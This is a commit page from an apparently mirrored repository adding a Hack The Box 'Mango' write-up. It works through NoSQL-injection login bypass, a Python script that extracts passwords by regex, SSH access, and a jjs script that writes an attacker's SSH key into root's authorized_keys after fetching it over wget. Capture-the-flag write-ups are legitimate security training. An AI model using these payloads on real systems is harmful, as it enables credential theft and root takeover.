oxeo0/hacking-blogposts
1
0
Fork 0
mirror of http://git.nowherejezfoltodf4jiyl6r56jnzintap5vyjlia7fkirfsnfizflqd.onion/nihilist/hacking-blogposts.git synced 2025-05-16 20:37:01 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions

add hacking blogposts as they are

Browse source
This commit is contained in:
oxeo0 2025-05-07 01:02:00 +02:00
parent fa65088be1
commit 325b9c3814
1904 changed files with 91353 additions and 0 deletions
Download patch file Download diff file Expand all files Collapse all files

481
Medium/50.md Normal file
View file

@ -0,0 +1,481 @@
# Mango Writeup
![](img/50.png)
## Introduction :
Mango is a Medium linux box released back in October 2019.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/mango]
→ nmap -sCV -p22,80,443 10.10.10.162
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-22 09:05 CEST
Nmap scan report for 10.10.10.162
Host is up (0.46s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp open http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after: 2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Service Info: Host: 10.10.10.162; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.36 seconds
## **Part 2 : Getting User Access**
Our nmap scan picked up port 80 with the domain name **staging-order.mango.htb** so let's investigate it after we add it to our hosts file:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/mango]
→ sudo -i
[sudo] password for nothing:
┌──(root💀nowhere)-[~]
└─# echo '10.10.10.162 staging-order.mango.htb mango.htb' >> /etc/hosts
┌──(root💀nowhere)-[~]
└─# ping -c1 mango.htb ; ping -c1 staging-order.mango.htb
PING staging-order.mango.htb (10.10.10.162) 56(84) bytes of data.
64 bytes from staging-order.mango.htb (10.10.10.162): icmp_seq=1 ttl=63 time=466 ms
--- staging-order.mango.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 466.188/466.188/466.188/0.000 ms
PING staging-order.mango.htb (10.10.10.162) 56(84) bytes of data.
64 bytes from staging-order.mango.htb (10.10.10.162): icmp_seq=1 ttl=63 time=461 ms
--- staging-order.mango.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 460.854/460.854/460.854/0.000 ms
┌──(root💀nowhere)-[~]
└─# exit
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/mango]
Now mango.htb gives us a 403 forbidden error message:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/mango]
→ curl mango.htb
403 Forbidden
# Forbidden
You don't have permission to access this resource.
* * *
Apache/2.4.29 (Ubuntu) Server at mango.htb Port 80
However the **staging-order** subdomain has something else for us:
![](prg/50_001.png)
Now we intercept the POST login request with burpsuite, and send it to the repeater:
![](prg/50_002.png)
Now once we send the request, we see that it just puts us back at the login page with nothing interesting to debug the logins themselves.
![](prg/50_003.png)
So instead we're going to use ffuf to find webpages:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/mango]
→ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -fc 403 -u http://staging-order.mango.htb**/FUZZ**
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive
________________________________________________
:: Method : GET
:: URL : http://staging-order.mango.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 50
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response status: 403
________________________________________________
# [Status: 200, Size: 4022, Words: 447, Lines: 210]
# [Status: 200, Size: 4022, Words: 447, Lines: 210]
[...]
**vendor [Status: 301, Size: 335, Words: 20, Lines: 10]**
[WARN] Caught keyboard interrupt (Ctrl-C)
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/mango]
→ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -t 50 -fc 403 -u http://staging-order.mango.htb**/vendor/FUZZ**
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive
________________________________________________
:: Method : GET
:: URL : http://staging-order.mango.htb/vendor/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 50
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response status: 403
________________________________________________
**composer [Status: 301, Size: 344, Words: 20, Lines: 10]**
[WARN] Caught keyboard interrupt (Ctrl-C)
Here we found the **/vendor/composer/** directory, [composer](https://en.wikipedia.org/wiki/Composer_\(software\)) is a PHP dependency manager that provides a standard format for managing dependencies of PHP software and required libraries. Composer usually contains a file called **installed.json** so we browse to see if it's there:
![](prg/50_004.png)
And since we have been able to verify that the box has a [mongodb NoSQL](https://www.mongodb.com/nosql-explained) backend we can now assume that we need to perform a [NoSQL injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)
![](prg/50_005.png)
So here we have a few potential NoSQL injections to try out, but the one we need here is the **[$ne]** (not equal) authentication bypass exploit:
![](prg/50_006.png)
We attempt the not equal ([$ne]) authentication bypass and succeed to login as the admin user, however we don't get anything interesting after logging in:
![](prg/50_007.png)
so instead when we take another look at the payloadallthethings nosql cheatsheet, we see that it is possible to extract informations from the database via regex:
![](prg/50_008.png)
So we make the following python script to automate this information disclosure:
[ 10.10.14.11/23 ] [ /dev/pts/20 ] [~/HTB/mango]
→ cat injection.py
import requests
def inject(data):
r = requests.post('http://staging-order.mango.htb/', data=data, allow_redirects=False)
if r.status_code != 200:
return True
secret = ""
payload= ""
while True:
data = { "username[$regex]":"^" + payload + "$", "password[$ne]":"admin", "login":"login" }
if inject(data):
break
for i in range(32,126):
if chr(i) in ['.','?','*','^']:
payload = secret + "\\" + chr(i)
else:
payload = secret +chr(i)
print("\r" + payload, flush=False, end='')
data = { **"username":"admin", "password[$regex]":"^" + payload** , "login":"login" }
if inject(data):
print("\r" + payload, flush=True, end='' )
secret= secret + chr(i)
break
print()
We're going to try to get the admin password:
[ 10.10.14.11/23 ] [ /dev/pts/20 ] [~/HTB/mango]
→ python3 injection.py
t++9++K++c++S++3++>!++0++B#++2$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
And as you can see it matches the **$** as being the end of the line, however the + symbol is a bad character so we need to filter it:
[ 10.10.14.11/23 ] [ /dev/pts/20 ] [~/HTB/mango]
→ vim injection.py
[...]
if chr(i) in ['.','?','*','^','+']:
[...]
:wq
[ 10.10.14.11/23 ] [ /dev/pts/20 ] [~/HTB/mango]
→ python3 injection.py
t9KcS3>!0B#2$$$$$$$$
Now that we have the admin credentials **admin:t9KcS3>!0B#2** , now let's get the mango user's password:
[ 10.10.14.11/23 ] [ /dev/pts/20 ] [~/HTB/mango]
→ vim injection.py
[...]
for i in range(32,127):
if chr(i) in ['.','?','*','^', '+', '|']:
[...]
data = { **"username":"mango", "password[$regex]":"^" + payload** , "login":"login" }
[...]
:wq
[ 10.10.14.11/23 ] [ /dev/pts/20 ] [~/HTB/mango]
→ python3 injection.py
h3mXK8RhU~f{]f5H$$$$$$$$$$$$$$$$$
So now we have mango's credentials: **mango:h3mXK8RhU~f{]f5H**
So let's login via SSH:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/mango]
→ ssh mango@10.10.10.162
The authenticity of host '10.10.10.162 (10.10.10.162)' can't be established.
ECDSA key fingerprint is SHA256:AhHG3k5r1ic/7nEKLWHXoNm0m28uM9W8heddb9lCTm0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.162' (ECDSA) to the list of known hosts.
mango@10.10.10.162's password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Jun 22 09:45:28 UTC 2021
System load: 0.0 Processes: 102
Usage of /: 25.8% of 19.56GB Users logged in: 0
Memory usage: 15% IP address for ens33: 10.10.10.162
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
122 packages can be updated.
18 updates are security updates.
Last login: Mon Sep 30 02:58:45 2019 from 192.168.142.138
mango@mango:~$ id
uid=1000(mango) gid=1000(mango) groups=1000(mango)
We are now logged in as the user mango, but we also have other credentials for the admin user, so let's try them:
mango@mango:~$ su - admin
Password:
$ id
uid=4000000000(admin) gid=1001(admin) groups=1001(admin)
$ bash
To run a command as administrator (user "root"), use "sudo ".
See "man sudo_root" for details.
admin@mango:/home/admin$ ls
user.txt
admin@mango:/home/admin$ cat user.txt
0aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get to the admin user on the box and print the user flag.
## **Part 3 : Getting Root Access**
Now in order to privesc on this box we're going to use linpeas.sh to enumerate it:
[ 10.10.14.11/23 ] [ /dev/pts/23 ] [~/HTB/mango]
→ cp /home/nothing/HTB/Traverxec/linpeas.sh .
[ 10.10.14.11/23 ] [ /dev/pts/23 ] [~/HTB/mango]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
admin@mango:/home/admin$ wget http://10.10.14.11:9090/linpeas.sh -O /tmp/peas.sh
--2021-06-22 09:49:08-- http://10.10.14.11:9090/linpeas.sh
Connecting to 10.10.14.11:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 341863 (334K) [text/x-sh]
Saving to: /tmp/peas.sh
/tmp/peas.sh 100%[======================================================================================================================================================>] 333.85K 175KB/s in 1.9s
2021-06-22 09:49:11 (175 KB/s) - /tmp/peas.sh saved [341863/341863]
admin@mango:/home/admin$ chmod +x /tmp/peas.sh
admin@mango:/home/admin$ /tmp/peas.sh
` ![](prg/50_009.png)
Let it run and then scrolling through the output we stumble upon **/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs**
![](prg/50_010.png)
For that we can take a look at [gtfobins:](https://gtfobins.github.io/gtfobins/jjs/#file-write)
![](prg/50_011.png)
So here we have our template exploit bashscript:
echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw=new FileWriter("./file_to_write");
fw.write("DATA");
fw.close();' | jjs
we're going to modify it to place a public ssh key into /root/.ssh/authorized_keys
echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw=new FileWriter("/root/.ssh/authorized_keys");
fw.write("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAfhgjcMFy5mO4fwhQyW6vdX5bgTzqZTh9MhCW7+k6Sj nothing@nowhere");
fw.close();' | jjs
download the exploit onto the box:
[ 10.10.14.11/23 ] [ /dev/pts/23 ] [~/HTB/mango]
→ cat exploit.sh
#!/bin/bash
echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw=new FileWriter("/root/.ssh/authorized_keys");
fw.write("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAfhgjcMFy5mO4fwhQyW6vdX5bgTzqZTh9MhCW7+k6Sj nothing@nowhere");
fw.close();' | jjs
[ 10.10.14.11/23 ] [ /dev/pts/23 ] [~/HTB/mango]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
admin@mango:/home/admin$ wget http://10.10.14.11:9090/exploit.sh -O /tmp/exploit.sh
--2021-06-22 09:59:06-- http://10.10.14.11:9090/exploit.sh
Connecting to 10.10.14.11:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 250 [text/x-sh]
Saving to: /tmp/exploit.sh
/tmp/exploit.sh 100%[===========================================================================================================================================>] 250 --.-KB/s in 0s
2021-06-22 09:59:07 (22.7 MB/s) - /tmp/exploit.sh saved [250/250]
admin@mango:/home/admin$ chmod +x /tmp/exploit.sh
admin@mango:/home/admin$ /tmp/exploit.sh
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var FileWriter = Java.type("java.io.FileWriter");
jjs> var fw=new FileWriter("/root/.ssh/authorized_keys");
jjs> fw.write("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAfhgjcMFy5mO4fwhQyW6vdX5bgTzqZTh9MhCW7+k6Sj nothing@nowhere");
jjs> fw.close();
jjs> admin@mango:/home/admin$
now login as root:
[ 10.10.14.11/23 ] [ /dev/pts/23 ] [~/HTB/mango]
→ ssh root@10.10.10.162 -i ~/.ssh/mainpc
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Jun 22 09:59:46 UTC 2021
System load: 0.0 Processes: 112
Usage of /: 26.0% of 19.56GB Users logged in: 1
Memory usage: 10% IP address for ens33: 10.10.10.162
Swap usage: 5%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
122 packages can be updated.
18 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Oct 10 08:33:27 2019
root@mango:~# cat /root/root.txt
70XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get the root flag.
## **Conclusion**
Here we can see the progress graph :
![](img/50_graph.png)